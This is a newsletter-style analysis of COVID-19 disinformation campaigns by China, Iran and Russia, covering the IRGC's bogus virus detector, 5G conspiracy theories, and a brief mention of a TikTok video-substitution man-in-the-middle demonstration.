At a glance.
- Not quite a deep fake, but the possibility of a damaging fake.
- China's COVID-19 disinformation campaigns.
- Iran's derivative disinformation campaigns, with an excursus into quackery.
- Disinformation and delusion.
- Notes on an alleged Russian campaign against Western (especially US) science.
- Experts who should know better.
- The technical, practical, and ethical challenges of content moderation.
Video substitution in TikTok.
App developers posting at Mysk say that it's possible to show TikTok users fake videos. Naked Security was able to replicate their hack.
Erich Kron, Security Awareness Advocate at KnowBe4, commented on the demonstration: "Anytime an internet application uses HTTP instead of HTTPS, there is a risk of the information being modified in a man-in-the middle attack. While this attack is possible, the risks are fairly low given the requirements needed to pull it off. You really should not be using TikTok as your source of important news without verifying its authenticity by going straight to the news media site to confirm it. It is critical that we teach people how to verify stories on legitimate websites, especially given the proliferation of misleading information in all areas of social media, especially during highly emotional times like this COVID-19 pandemic."
Short game: China's COVID-19 disinformation campaigns.
The Wall Street Journal has an overview of the shape, scope, and probable objectives of the Chinese government’s disinformation campaign concerning the coronavirus pandemic. The efforts’ goals seem to be at least threefold. First, deflect any blame for mishandling the epidemic away from the Chinese government. This would include misleading accounts about the epidemic’s emergence and subsequent development as well as disinformation about its recent progress (like, for example, the claim that none of Hubei Province’s 42,000 healthcare workers were infected with COVID-19, a claim contradicted by earlier Journal reporting).
That first objective is related to the second: fix any blame there might be for the emergence of the virus somewhere else. That somewhere else has usually been the United States, China’s principal international rival, and the blame has either taken the form of contentions that the virus was a US biowar project gone (arguably) wrong, or that US personnel were somehow the initial infection vectors in Wuhan. These claims tend to be stronger than that the natural disaster or epidemic has been made worse by official missteps or bungling: they often carry the implication of conspiracy. (And if there have been missteps or bungling, they weren’t made by the Chinese Communist Party.)
The fixation on an American origin story hasn’t prevented the development of domestic policies that focus on Africans resident in China as infection vectors. Quartz notes that a wave of evictions has pushed African migrants out of housing and denied them alternative accommodations. The governments of Ghana, Nigeria, Kenya, and Uganda have summoned Beijing’s ambassadors and demanded explanations.
And third, there’s a broader effort to portray China as a good international citizen, a reliable and technologically savvy provider of humanitarian aid. A contrast is generally drawn to the United States, with the Americans depicted as the opposite: unreliable, inept, and unfeeling. This would be a move toward displacing, where it can, the US from exercising this kind of soft power. (That messaging is undercut by evictions of African migrants, but those evictions are for domestic consumption.)
The methods the Chinese services have adopted depend strongly on state-run media gaining access to social media audiences through advertising, with subsequent amplification in other social media posts. Researchers at the Stanford Internet Observatory told the Wall Street Journal that Beijing has purchased over two-hundred political ads on Facebook since the end of 2018. More than a third of those, however, were bought within the past two months, and those for the most part “focused on trying to shape global perception around China’s handling of the coronavirus outbreak.” China’s Facebook political advertising has drawn roughly forty-five-million views since February 15th, which in volume at least exceeds the reach the Internet Research Agency, that active Russian troll farm, achieved around the US 2016 elections.
Facebook said last October that it would label ads purchased by state media, and Twitter says it’s banned advertising by state media. Chinese government operators, however, have proved able to run ads (unlabeled) on both platforms.
The method of the Chinese disinformation surrounding coronavirus has been compared to Russian disinformation operations, and they do have in common an effort to darken counsel and induce doubt. But whereas Russian operations have tended to be purely disruptive, the Chinese disinformation is organized to serve positive--positive from the Chinese government’s point of view--goals. It’s also made more use of advertising.
Some of the disinformation has been heavy-handed and obvious, like an attempt the National Review reports in which the Chinese Consulate in Chicago attempted to get the Wisconsin legislature to pass a resolution praising China's handling of the Wuhan outbreak. But two other techniques are noteworthy, because they show some success. First, there’s a tendency to pick up casual posts along the lines of “you know, I had a funny cold a couple of months ago; wonder if it was coronavirus.” These are amplified to suggest that the virus had its origins outside of China. Second, there’s also a tendency to communicate by insinuation. Thus the claim that COVID-19 is the product of a US biowar program is typically made not by assertion, but by posing a question: Was COVID-19 an American weapon? Inquiring minds want to know. Shouldn’t this be investigated? We’re not saying it’s so, but it sure sounds suspicious. And so on.
Such conspiracy mongering gains traction with repetition. The intended audience is Southeast Asia, Eastern Europe, and Africa. But Foreign Affairs suggests that not as many are buying the Chinese line as Beijing might hope. An essay in Foreign Policy argues that mistreatment of African expatriates in China during the virus response have damaged China's charm offensive in Africa. Another Foreign Policy piece points out that conspiracy theories in general are proving difficult to control.
Another short game: Iranian disinformation rides Beijing's coattails.
Chinese operators have been the most active purveyors of disinformation during the COVID-19 emergency, but other actors haven't been idle either. Graphika reports that an Iranian threat group, the International Union of Virtual Media (IUVM, a front operation), has been active in pushing the line that the coronavirus had its origins in a US biowar program. "The IUVM operation is significant and manned by a well-resourced and persistent actor, but its effectiveness should not be overstated," Graphika cautions. Their reach has been limited, attracting only around 3000 followers, the Verge notes.
But persistent they have been. The group's accounts have been the repeated target of takedowns by Facebook, Google and Twitter, but they continue to reappear. Their line is generally pro-Iranian and pro-Palestinian; anti-US, anti-Israel, anti-Turkey, and anti-Saudi. Like much Chinese disinformation (and unlike much Russian disinformation), the Iranian efforts aim at persuading an audience to specific set of views, and not merely at disruption. On the principle of the enemy of my enemy is my friend, the IUVM has been heavily engaged in repeating stories that tend to Beijing's advantage. They generally praise China's response to the epidemic, dismiss criticism of Beijing as "psychological warfare," commend China's contributions to international emergency relief, and even praise China's business acumen in using the crisis as an opportunity to buy low and sell high.
Some Iranian disinformation has aimed at boosting domestic morale, with perhaps a secondary objective of boosting the Islamic Republic's scientific chops in the rest of the world. Radio Free Europe | Radio Liberty reports that the Islamic Revolutionary Guard Corps (IRGC) has exhibited what it describes as a device capable of detecting COVID-19 by generating a magnetic field capable of revealing infection at distances of a hundred meters, with no blood samples required. The IRGC credits scientists working for the Basij paramilitaries with the invention. The device on display, technical implausibility aside, seems to be the same bogus device sold by a crew of British fraudsters as a bomb detector. (The gentlemen and lady responsible for that scam, some of whose marks were in Iran, as it happens, were convicted in British courts and detained for some years at her Majesty's pleasure. The BBC has the story. The device has a history going back to the 1990s, when American scam artists first introduced it as the "Gopher," a device golfers could use to find their lost balls on the course.) It's dowsing, with a little electromagnetic lipstick.
It's worth noting that Iran's Health Ministry quickly reacted to the IRGC's televised announcement of the screener by stressing that the device had been neither tested nor licensed. This suggests, first, that Iranian agencies aren't moving in lockstep, and also that the IRGC may have given in to quackery as opposed to having taken a decision to mount an elaborate disinformation campaign. The quack tends to believe his own press releases. Not so the charlatan, the scam artist, or the propagandist.
In any case, the story has met with some domestic skepticism. As Radio Free Europe | Radio Liberty points out, the local mood isn't in this case a particularly credulous one: "'The IRGC could not distinguish a passenger plane from a missile, how can we believe that it can detect a virus in nanometer dimensions in less than five seconds,' a user said on social media."
Other actors, mixing disinformation and delusion.
To return to conspiracy theories, they've been used with success by state actors (consider the tragic history of the Protocols of the Elders of Zion, an antisemitic piece fabricated by the Tsarist Okhrana in the late Nineteenth Century that's contributed to as much suffering as any document we can think of). Such conspiracy mongering gains traction with repetition. The intended audience of the conspiracy theory about COVID-19 that Beijing has been retailing is Southeast Asia, Eastern Europe, and Africa. Much of the Chinese disinformation has been picked up, opportunistically, by Russian and Iranian services.
It’s also been picked up by non-state actors, extremists of various varieties or unwitting agents of influence adopting various elements of the Chinese line. The agents of influence have tended to focus on isolated pieces of Chinese disinformation. The extremists who are retailing bogus conspiracy theories, mostly Islamist and far-right, according to the Washington Post, have been more independent if not particularly original. Their work has most often been a variation on an anti-semitic theme, with calls for radicalization and incitement to action. One depressing social media post was from an Islamist extremist who said he was infected with COVID-19 and so was volunteering his services as a biological weapon. He was interested in hearing suggestions concerning targeting.
Long game: Russian disinformation aims at US science.
The New York Times claims that Russia has been running a long campaign aimed at undermining the authority of US scientific consensus on a range of topics, but especially on health-related and biomedical research. The “decade long” disinformation campaign is said to have promoted quack treatments and questionable research, “undermining major institutions” and rendering outbreaks of disease more serious. The report sees some of the effects of that campaign manifesting themselves in the response to the COVID-19 pandemic. It’s a long game, and the goal is the usual one of darkening counsel and sowing mistrust.
One should be cautious, however, about attributing too much success to the campaign the New York Times describes. Bellingcat, no friend of the Kremlin, offers a number of animadversions about the Times story, most of which come down to offering reasons to think that the Times is too willing to take its examples of disinformation at the propagandists' own estimation. The report, for example, makes a great deal of a news aggregator called "Russophile." Russophile is real enough, but Bellingcat describes it as a small, route-step outfit with perhaps 3000 followers or so. Russophile's claims to be based in Russia even appear bogus.
Bellingcat also wants to insist on some useful distinctions, which seem right. To summarize them briefly, there are two terms that have come to be used interchangeably in reports of disinformation: bots and trolls. Bellingcat adds a third, obvious category: jerks. Bots are automated spewers of content. Trolls are not: when not controlled by some guiding intelligence service, they're just jerks who make a nuisance of themselves in chatrooms, comment sections, and social media. But a troll in the context of a disinformation campaign—like the ones run by the troll farmers of Saint Petersburg's Internet Research Agency—ah, those are jerks with marching orders, or nice guys paid to act like jerks, and to march. Bellingcat stresses that reach and consequence are important:
"Perhaps the most important lesson of addressing disinformation is to consider the importance and consequences of highlighting specific reports. Cherrypicking reports of disinformation is not terribly difficult — there are a bevy of “alternative news” sites that are ideologically driven and far from truthful in their publications. However, when a large media organization such as the New York Times lifts a little-read or obscure story, the tiny whimper of disinformation is transformed into something far louder and more dangerous.
"As of the time of this piece’s publication, the tweet from the Russophile account sharing the coronavirus disinformation described in the New York Times had one retweet and two favorites. An engagement of three people is, apparently, enough to warrant a reaction in the paper of record."
Russia has its own popular problems with pseudoscience and charlatan healers. Radio Free Europe | Radio Liberty notes that a late-Soviet period psychic, Anatoly Kashpirovsky, has resurfaced as a presence on YouTube. (Lest Americans get too cocky, we will note that we've seen a lot more Peter Popov healing water commercials on TV lately, too.)
Disinformation is a challenge the US military may have trouble meeting.
State actors, notably China (defensively), Russia (disruptively), and to a lesser extent Iran (with conspiracy-mongering whacks at its two bêtes noires, the United States and Israel), have actively pushed various lines of disinformation about COVID-19's origins and propagation. A Military Times op-ed wonders how well prepared the US Department of Defense is to parry large-scale disinformation campaigns and concludes that the answer is "not very." The op-ed's authors see doctrinal confusion as presenting an obstacle to clarity (and to the assignment of roles and missions in ways that make operational sense).
Research that isn’t really, well, research, at least not yet. Or experts behaving badly.
This may be seen in a simulation by researchers at the Eindhoven University of Technology, published as a gif showing how “droplets” might be spread in the “slipstream” of runners, cyclists, and others exercising out of doors. It’s been widely disseminated by people cautioning one another about the dangers of being out of doors at all, with so many COVID-19 vectors out there cropdusting away as they try to get some exercise.
The lead researcher complains, as quoted in Vice, that “people should read and not misread my tweets and texts,” but in this case the researchers have written so little that perhaps people should be forgiven for not reading what’s not really there. It’s often said that “data” is not the plural of “anecdote,” and it might be worth adding another useful rule-of-thumb: a gif is not a report of research.
Anyone familiar with the difficulties of simulating and predicting downwind hazards is unlikely to be taken in, but those who aren’t (and that’s most of us) may find the gif frightening and convincing. After all, there it is, in all the animated colors of the rainbow. Lead researcher Bert Blocken, a professor of aerodynamics, again according to Motherboard, “I have never and nowhere discouraged people from walking, running, or cycling. Rather the opposite. Maybe people should read more, and react less.”
But he did speak with Laatste Nieuws in order to warn people of the danger of getting too close to joggers, because after all, as he tweeted, "Crisis is urgent." So which is it? You can read the news articles and the tweets as closely as possible, with all the hermeneutical skills in the world, but without some extratextual knowledge you’d be spooked, too.
Looking ahead, some advocate a post-pandemic content moderation regime.
In fairness content moderation is a tough and unfamiliar problem, even if you think of it in the slightly old-fashioned terms of rumor control. There's no easy list of best practices to inform effective counter-messaging. Some of the difficulty in handling disinformation may be seen in the speed with which misinformation spreads, and the surprising reach even implausible memes can have. WIRED traces the strange conviction that COVID-19 is somehow related to 5G, and that such relationship has been created by some conspiracy or other, to a January interview in a Belgian publication. (It’s a Flemish publication, by the way, so one would expect even more reach had it appeared in Francophone media, there being many more speakers of French in the world than there are speakers of Dutch.) It's since been picked up by the dreary and tiresome celebrity tribes of slacktivists and influencers, with regrettably but predictably far-reaching effects. Some of those effects have even been kinetic, as cell towers in the English midlands have been vandalized and telecommunications workers threatened.
Another essay in WIRED offers a public health case for post-crisis regulation of political discourse. "We must recognize that political discourse is public health," is how it closes. How such content control might be accomplished isn't entirely clear, but the author's preferred solutions seem to run along corporatist lines. As an earlier communitarian slogan had it, the personal is political, and the argument in WIRED clearly asserts that rights reside primarily in communities, only secondarily in individuals. In certain communities, that is: some communities appear to be more equal than others. The epistemological, or narrative, question of what content is true and what false, or perhaps which is privileged and which problematic, would presumably remain to be worked out. As to establishing or reestablishing trust in the right authorities, see the notes above about slipstreams and virus-detection with magnetic fields for some perspective on why that may be a harder sell than those who would see a convergence of political discourse and public health might think.